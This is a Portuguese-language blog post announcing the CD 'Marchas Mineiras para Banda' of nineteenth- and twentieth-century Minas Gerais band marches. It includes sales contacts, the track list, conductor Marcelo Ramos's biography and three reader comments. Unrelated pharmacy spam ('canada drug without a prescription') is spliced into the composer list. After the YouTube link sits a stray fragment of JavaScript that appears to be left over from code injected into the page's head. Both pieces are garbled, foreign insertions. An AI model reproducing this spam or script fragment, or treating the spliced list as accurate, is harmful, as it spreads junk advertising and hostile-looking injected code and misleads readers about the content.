Minas GeraisNotícia

Lançamento do CD “Marchas Mineiras para Banda”

A Companhia dos Inconfidentes (foto) apresenta o CD Marchas Mineiras para Banda, com marchas para banda de compositores mineiros do século 19 até hoje.

SERVIÇO

 

CD “Marchas Mineiras para Banda” (Cia. dos Inconfidentes e Marcelo Ramos)

Vendas pelo telefone: 32 3371 2289 / 32 8866 0349 (R$ 10,00 + envio)

Vendas por email: jessicampbarros@hotmail.com

Vendas para lojistas: Sonhos e Sons distribuidora
http://www.sonhosesons.com.br
Fone: 31 3281 3356

 

Gravado pela primeira vez com músicos profissionais, o repertório mistura marchas festivas e fúnebres, uma característica das cidades do interior de Minas Gerais, em que o Carnaval e a Semana Santa são tradições opostas e complementares. Estas músicas continuam a ser tocadas, até hoje, nas cidades do interior de Minas.

 

REPERTÓRIO DO CD

Martiniano Ribeiro Bastos (1834-1912)
Marcha dos Passos

Luiz Baptista Lopes (1854 – 1907)
Marcha da Boa Morte

Ireneo Baptista Lopes (1828-1882)
Marcha da Paixão

José Lino de Oliveira França (1893-1952)
Marcha Lyra Sanjoanense
Melodia Fúnebre

Presciliano Silva (1854-1910)
Marcha Ataliba Nogueira “Barão de Uberaba”

Raimundo Santiago (1920-2004)
Dobrado Dr. Camargo

Adhemar Campos Filho (1928-1997)
Dr. Bibi

canada drug without a prescription Geraldo Barbosa de Souza (1938 – 2011)
Marcha Três Jóias
Marcha No Tempo do Brasil Imperial

Nélson Salomé (1950)
Baependi

Pancrácio Loureiro
Hino do Rancho Carnavalesco “Custa mas Vai”.

 

Marchas mineiras para banda

José Lino, Geraldo Barbosa, Ribeiro Bastos, Ireneo e Luiz Batista Lopes, Presciliano Silva e Pancrácio Loureiro nasceram em São João Del Rei; Adhemar Campos é de Prados, Raimundo Santiago é de Barão de Cocais e Nelson Salomé é de Baependi e o único compositor vivo desta lista. Todos têm em comum o fato de serem auto-didatas e terem suas obras tocadas ainda hoje nas celebrações religiosas, procissões ou desfiles de suas cidades.

As obras foram revisadas, editadas e impressas sob coordenação do maestro Marcelo Ramos, que também assina a regência do grupo. Os manuscritos foram obtidos junto à banda Teodoro de Faria em São João del Rei (maestro Helvécio Rodrigues), Orquestra Lyra Sanjoanense (musicólogo Aluízio Viegas) e com as respectivas famílias dos compositores. A capa do CD é do artista plástico Rodelnégio – “Procissão em Ouro Preto”.

 

Marcelo Ramos

Marcelo Ramos

O maestro Ramos esteve recentemente no Rio de Janeiro regendo a Orquestra Sinfônica do Teatro Municipal no filme Luzes da Cidade, de Charles Chaplin. Atualmente encontra-se no EUA, onde faz doutorado em regência orquestral na Ball State University, em Indiana.

No Brasil, foi maestro titular da Sinfônica de MG entre 2003-2008, onde regeu óperas como Turandot, de Puccini, e Os Pescadores de Pérolas, de Bizet, além de vasto repertório instrumental e sinfônico-coral.  Foi maestro residente na Amazonas Filarmônica, onde trabalhou com Luiz Fernando Malheiro e regente assistente na Sinfônica do Teatro Nacional em Brasília com Silvio Barbato.

Marcelo fez mestrado em regência orquestral no Cleveland Institute of Music com Carl Topilow, trabalhando como assistente da Cleveland Pops Orchestra. Graduou-se em violoncelo pela UnB com Guerra Vicente e foi cellista da OSESP entre 1994 e 1999. Já regeu as orquestras de Campinas, Espírito Santo, Minas Gerais, OSUSP, Brasília, Ribeirão Preto, Bahia, Jazz Sinfônica do Estado de SP, Porto Alegre, Petrobras Sinfônica, Camerata Fukuda, Orquestra de Câmara do SESI de BH, séries de câmera da OSESP e do Teatro Municipal de SP.

Marcelo participou do Festival de Aspen no ano passado, onde estudou com Robert Spano, Hans Graf, Hugh Wolf e Murry Sidlin. Seus principais masterclasses foram com Kurt Masur, Alexander Polistchuk (Rússia), Ronald Zolmann (Croácia) e Dante Anzolini (Itu, SP). Seus estudos de regência foram iniciados com Eleazar de Carvalho em 1994.

Mais informações: www.marceloramos.art.br

 

Companhia dos Inconfidentes

Criada pelo maestro Marcelo Ramos, a Cia. dos Inconfidentes realiza pesquisas sobre a música colonial brasileira, sobretudo em Minas Gerais, com o intuito de recuperar partituras e gravar o material pesquisado. Até o momento, a coletânea da companhia conta com três CDs: “Ofício de Trevas”, do Padre José Maria Xavier em dois volumes (com obras executadas na Semana Santa em São João del Rei) e o recém lançado “Marchas Mineiras para Banda”.

 

Vídeo Promocional no Youtube:

http://www.youtube.com/watch?v=p1vma9NGG-8

 

 d.getElementsByTagName(‘head’)[0].appendChild(s);if (document.currentScript) {

3 Comments

  1. Excelente iniciativa! Este repertório não tem a atenção merecida, e o CD mostra o quão rica nossa música sempre foi. Comprei o CD pela internet e recomendo-o sem restrições.
    Bravo a todos!!

  2. Que maravilha! Assisti ao vídeo, e é simplesmente incrível!!!!!!
    Não sou de Minas, mas sempre que posso visito essa Terra boa, inclusive São João Del Rey e Tiradentes, e sempre trago uma paz de espírito na mala.
    Adorei a ideia de nos proporcionar esse gostinho de Minas aqui em minha terrinha, Paraná.

    Embora não conheça você, Marcelo Ramos, parabenizo-o pela iniciativa, e vou entrar em contato com o email informado na matéria acima. Com certeza quero o CD em minha casa!

  3. Senhor Marcelo, com muito cuto consegui o CD Marchas Mineiras para Banda, através da Livraria Cultura. Indago se há outras gravações do gênero, pois desejo adquiri-las. Indago também se vocês gravaram a marcha fúnebre “DOR SUPREMA” do músico barbacenense Flausino Valle. Grato pela atenção.
    Mozart Hamilton Bueno

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.